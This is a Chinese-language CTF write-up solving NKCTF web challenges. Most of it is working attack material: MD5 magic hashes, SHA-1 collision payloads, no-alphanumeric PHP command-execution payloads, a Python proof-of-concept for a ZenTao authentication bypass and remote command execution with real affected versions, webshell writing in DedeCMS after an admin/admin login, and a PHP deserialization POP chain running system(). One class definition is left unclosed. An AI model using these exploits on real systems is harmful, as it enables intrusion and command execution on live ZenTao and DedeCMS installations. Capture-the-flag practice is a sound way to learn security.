EZPHP
一个一个慢慢绕过
第一层 MD5弱比较
参数a和b选其中一个进行绕过
QNKCDZO
240610708
s878926199a
s155964671a
第二层 sha1绕过
用两个sha1相同的值进行绕过(注意这里不能用burp)
c=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&d=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1
第三层 intval 参考这个用114514.01进行绕过
第四层 NS_CTF.go
对这个参数进行传参要注意的是 不能又_ 用[代替
最后一层过滤掉了所有的可见字符
无字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本)_无字母数字异或运算绕过_yu22x的博客-CSDN博客
找一个在线运行php的
<?php
$a=urlencode(~('system'));
$b=urlencode(~('cat /flag'));
echo $a;
echo "\n";
echo $b;
?>
传参:cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);
得到最后的flag
PMS
禅道nady 上exp
# -*- coding: UTF-8 -*-
# !/usr/bin/python
'''
权限绕过+RCE POC 伪静态传参版
禅道系统 影响版本 安全版本
开源版 17.4以下的未知版本<=version<=18.0.beta1 18.0.beta2
旗舰版 3.4以下的未知版本<=version<=4.0.beta1 4.0.beta2
企业版 7.4以下的未知版本<=version<=8.0.beta1 8.0.beta2
'''
import requests
proxies = {
# "http": "127.0.0.1:8080",
# "https": "127.0.0.1:8080",
}
def check(url):
url1 = url + '/misc-captcha-user.html'
# url1 = url+'/index.php?m=misc&f=captcha&sessionVar=user'#非伪静态版本按照此格式传参
# url2 = url+'/index.php?m=block&f=printBlock&id=1&module=my'#可判断验证绕过的链接
url3 = url + 'repo-create.html'
url4 = url + 'repo-edit-10000-10000.html'
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
"Accept-Language": "zh-CN,zh;q=0.9",
"Cookie": "zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
}
headers2 = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
"Accept-Language": "zh-CN,zh;q=0.9",
"Cookie": "zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest",
"Referer": url + "/repo-edit-1-0.html"
}
data1 = 'product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid='
data2 = 'SCM=Subversion&client=`tac /flag`'
s = requests.session()
try:
req1 = s.get(url1, proxies=proxies, timeout=5, verify=False, headers=headers)
req3 = s.post(url3, data=data1, proxies=proxies, timeout=5, verify=False, headers=headers2)
req4 = s.post(url4, data=data2, proxies=proxies, timeout=5, verify=False, headers=headers2)
if 'uid=' not in req4.text:
print(url, "")
print(req4.text)
return True
except Exception as e:
print(e)
return False
if __name__ == '__main__':
print(check("http://1a64a76c-8af4-4111-9d02-a29992f2e9d6.node2.yuzhian.com.cn/"))
参考这篇博客
https://blog.csdn.net/qq_41904294/article/details/128838423
Hardphp
<?php
// not only ++
error_reporting(0);
highlight_file(__FILE__);
if (isset($_POST['NKCTF'])) {
$NK = $_POST['NKCTF'];
if (is_string($NK)) {
if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$NK) && strlen($NK) < 105){
eval($NK);
}else{
echo("hacker!!!");
}
}else{
phpinfo();
}
}
?>
Rce绕过 过滤可见字符一堆符合这里~ >都被过滤了只能用自增的方式来进行绕过
尝试了一圈发现都不太行 先phpinfo看看系统禁用了那些函数
构造一个数组让他报错执行phpinfo
过滤了很多函数 其中命令执行函数system被禁用了
再来继续看代码
过滤了所有的大小写字母和数字 常用的绕过方法取反~ 异或^ 均被过滤了这里还能采用另外一种方式 自增进行绕过
参考文章:
https://www.q1jun.cn/2023/01/21/9ccea94598fa-q1jun/#0x02-%E9%A2%98%E7%9B%AE%E8%AF%A6%E6%83%85
用readfile 读取flag
构造的payload
NKCTF=%24_%3D(_%2F_._)%5B___%5D%3B%24__%3D%2B%2B%24_%3B%24_____%3D%2B%2B%24_.%24__%3B%2B%2B%24_%2F%2B%2B%24_%3B%24_%3D_.%24_____.%3D%2B%2B%24_.%2B%2B%24_%3B%24%24_%5B___%5D(%24%24_%5B_%5D)%3B&___=readfile&_=/flag
easy_cms
织梦cms默认的后台界面
http://b5b35e86-4cba-4de3-a814-5c4896dd6607.node2.yuzhian.com.cn/dede
弱口令 admin admin登录进后台
查看模板设置 禁用了很多函数
将禁用函数全部删除
利用上传接口上传文件 直接传shell会被waf拦这里用文件写入的方法写入shell
上传文件
访问执行
成功写入shell
baby_php
构造顺序:
Welcome:: destruct -> Hel10:: tostring-> Happy:: invoke
参考文章:https://www.cnblogs.com/superwinner/p/17260940.html
unserialize php反序列化
url编码绕过正则检测
pop链
<?php
class Welcome{
public $name;
public $arg;
}
class Happy{
public $shell;
public $cmd;
class Hell0{
public $func;
}
$welcome = new Welcome(); //实例化对象
$welcome->name = "welcome_to_NKCTF"; //对welcome对象的name进行赋值
$happy = new Happy();
$hello = new Hell0();
$happy->shell = "urldecode";
$happy->cmd = "%73%79%73%74%65%6d%28%27%6c%73%20/%27%29%3b";
$hello->func = $happy;
$welcome->arg = $hello;
echo urlencode(serialize($welcome));
?>